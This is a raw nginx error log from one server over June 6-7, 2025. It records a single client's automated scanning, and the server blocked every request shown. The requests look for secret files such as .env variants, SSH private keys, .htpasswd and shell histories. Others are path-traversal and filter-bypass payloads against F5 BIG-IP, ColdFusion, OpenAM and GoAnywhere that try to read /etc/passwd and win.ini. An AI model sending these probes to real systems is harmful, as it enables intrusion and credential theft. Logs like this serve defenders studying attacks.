[error] 3725719#3725719: *470575 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.komodotools/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:35:01 [error] 3725719#3725719: *470615 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.inst/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:35:04 [error] 3725719#3725719: *470627 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.python-eggs HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:35:13 [error] 3725719#3725719: *470687 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:35:31 [error] 3725719#3725719: *470771 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:35:36 [error] 3725719#3725719: *470795 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.c9/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:35:36 [error] 3725719#3725719: *470799 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.cache HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:35:43 [error] 3725719#3725719: *470839 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.fontconfig/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:35:56 [error] 3725719#3725719: *470904 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.wp-config.php.swp HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:36:08 [error] 3725719#3725719: *470954 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.user.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:36:08 [error] 3725719#3725719: *470958 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.listing HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:36:09 [error] 3725719#3725719: *470966 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.config.php.swp HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:36:12 [error] 3725719#3725719: *470980 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.idea HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:36:14 [error] 3725719#3725719: *470992 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:36:15 [error] 3725719#3725719: *470996 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.hg HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:36:30 [error] 3725719#3725719: *471061 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.htpasswd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:36:37 [error] 3725719#3725719: *471085 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.zip HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:36:38 [error] 3725719#3725719: *471087 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.svn HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:36:40 [error] 3725719#3725719: *471101 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.mc/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:30:48 [error] 3725719#3725719: *486158 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.hg HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:30:52 [error] 3725719#3725719: *486179 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.wp-config.php.swp HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:30:55 [error] 3725719#3725719: *486194 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.idea HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:30:58 [error] 3725719#3725719: *486212 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.komodotools/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:31:00 [error] 3725719#3725719: *486217 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.mc/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:31:01 [error] 3725719#3725719: *486222 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.config.php.swp HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:31:04 [error] 3725719#3725719: *486243 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:31:06 [error] 3725719#3725719: *486249 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.listing HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:31:08 [error] 3725719#3725719: *486258 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.user.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:31:11 [error] 3725719#3725719: *486266 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.inst/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:31:12 [error] 3725719#3725719: *486271 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:31:16 [error] 3725719#3725719: *486290 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:31:22 [error] 3725719#3725719: *486315 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.python-eggs HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:31:26 [error] 3725719#3725719: *486331 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.svn HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:31:42 [error] 3725719#3725719: *486395 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:31:45 [error] 3725719#3725719: *486424 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.settings HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:31:55 [error] 3725719#3725719: *486466 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.zip HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:32:02 [error] 3725719#3725719: *486493 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.mc HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:32:03 [error] 3725719#3725719: *486496 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.codekit-cache HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:32:12 [error] 3725719#3725719: *486543 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.htpasswd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:32:14 [error] 3725719#3725719: *486552 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.idea/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:32:23 [error] 3725719#3725719: *486586 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.svn/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:32:25 [error] 3725719#3725719: *486599 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.cache/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:32:28 [error] 3725719#3725719: *486613 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.cache HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:32:29 [error] 3725719#3725719: *486616 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.pass HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:32:31 [error] 3725719#3725719: *486628 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.grunt/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:32:42 [error] 3725719#3725719: *486666 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.fontconfig/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:32:57 [error] 3725719#3725719: *486718 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.komodotools HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:32:59 [error] 3725719#3725719: *486725 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:33:10 [error] 3725719#3725719: *486777 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.c9/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 04:33:13 [error] 3725719#3725719: *486791 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 05:13:05 [error] 3725718#3725718: *608512 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/06/07 13:00:59 [error] 3725719#3725719: *664720 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:01:10 [error] 3725719#3725719: *664746 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:01:41 [error] 3725719#3725719: *664871 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:01:54 [error] 3725719#3725719: *664908 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ksh_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:01:58 [error] 3725719#3725719: *664926 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:02:05 [error] 3725719#3725719: *664958 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /hex/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:02:06 [error] 3725719#3725719: *664964 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.sh_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:02:16 [error] 3725719#3725719: *665001 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:02:17 [error] 3725719#3725719: *665007 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.zsh_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:02:18 [error] 3725719#3725719: *665015 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:09:46 [error] 3725719#3725719: *666175 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:11:09 [error] 3725719#3725719: *666285 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:14:08 [error] 3725719#3725719: *666669 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /hex/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:14:36 [error] 3725719#3725719: *666898 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:17:26 [error] 3725719#3725719: *667425 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:18:50 [error] 3725719#3725719: *667744 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:19:04 [error] 3725719#3725719: *667776 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:20:27 [error] 3725719#3725719: *668181 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ksh_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:21:12 [error] 3725719#3725719: *668336 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.sh_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:21:21 [error] 3725719#3725719: *668364 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.zsh_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:23:38 [error] 3725719#3725719: *668926 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:25:30 [error] 3725719#3725719: *669283 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:27:22 [error] 3725719#3725719: *669749 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:27:48 [error] 3725719#3725719: *669847 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /php/ztp_gate.php/.js.map HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:28:55 [error] 3725719#3725719: *670065 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /ui/..%5Csrc%5CgetSettings.rsb?@json HTTP/1.1", host: "kodi.linuxiarz.pl", referrer: "https://kodi.linuxiarz.pl:443" +2025/06/07 13:33:28 [error] 3725719#3725719: *671071 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:40:02 [error] 3725719#3725719: *672499 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /npm-pwg/..;/usp/searchUsers.do HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:42:51 [error] 3725719#3725719: *673254 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:50:23 [error] 3725719#3725719: *674946 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:50:24 [error] 3725719#3725719: *674948 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:50:24 [error] 3725719#3725719: *674949 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:50:24 [error] 3725719#3725719: *674950 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.dev HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:50:24 [error] 3725719#3725719: *674952 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:50:24 [error] 3725719#3725719: *674954 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:50:24 [error] 3725719#3725719: *674955 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:50:24 [error] 3725719#3725719: *674956 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:50:25 [error] 3725719#3725719: *674957 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.production HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:50:25 [error] 3725719#3725719: *674958 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:50:25 [error] 3725719#3725719: *674959 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:50:25 [error] 3725719#3725719: *674960 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:50:25 [error] 3725719#3725719: *674961 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:50:25 [error] 3725719#3725719: *674962 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:50:25 [error] 3725719#3725719: *674964 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.backup HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:50:25 [error] 3725719#3725719: *674966 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:50:25 [error] 3725719#3725719: *674967 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:50:26 [error] 3725719#3725719: *674969 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.www HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:50:26 [error] 3725719#3725719: *674970 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:50:26 [error] 3725719#3725719: *674971 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:50:26 [error] 3725719#3725719: *674972 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.linuxiarz HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:50:29 [error] 3725719#3725719: *674999 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.kodi HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:51:18 [error] 3725719#3725719: *675210 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:51:18 [error] 3725719#3725719: *675211 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_dsa HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:51:18 [error] 3725719#3725719: *675212 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa_1024 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:51:18 [error] 3725719#3725719: *675213 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa_2048 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:51:18 [error] 3725719#3725719: *675214 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa_3072 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:51:18 [error] 3725719#3725719: *675215 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa_4096 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:51:18 [error] 3725719#3725719: *675216 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_ed25519 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:51:57 [error] 3725719#3725719: *675317 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:52:22 [error] 3725719#3725719: *675399 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:52:22 [error] 3725719#3725719: *675401 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:52:22 [error] 3725719#3725719: *675402 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:52:22 [error] 3725719#3725719: *675403 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:52:22 [error] 3725719#3725719: *675404 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:52:24 [error] 3725719#3725719: *675423 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/windows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:53:09 [error] 3725719#3725719: *675602 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.wp-config.php.swp HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:55:16 [error] 3725719#3725719: *676227 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.drone.yml HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:55:51 [error] 3725719#3725719: *676344 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ftpconfig HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 13:59:26 [error] 3725719#3725719: *677379 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1", host: "kodi.linuxiarz.pl:443" +2025/06/07 14:00:31 [error] 3725719#3725719: *677727 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:02:36 [error] 3725719#3725719: *678117 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:02:42 [error] 3725719#3725719: *678143 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:02:42 [error] 3725719#3725719: *678144 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:02:42 [error] 3725719#3725719: *678145 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:02:42 [error] 3725719#3725719: *678147 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:02:42 [error] 3725719#3725719: *678148 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:02:42 [error] 3725719#3725719: *678149 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:02:43 [error] 3725719#3725719: *678150 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:02:43 [error] 3725719#3725719: *678151 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:02:43 [error] 3725719#3725719: *678152 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:02:43 [error] 3725719#3725719: *678155 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:02:43 [error] 3725719#3725719: *678156 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:03:39 [error] 3725719#3725719: *678379 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:03:41 [error] 3725719#3725719: *678395 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:03:41 [error] 3725719#3725719: *678396 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/07 14:03:41 [error] 3725719#3725719: *678397 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.dev 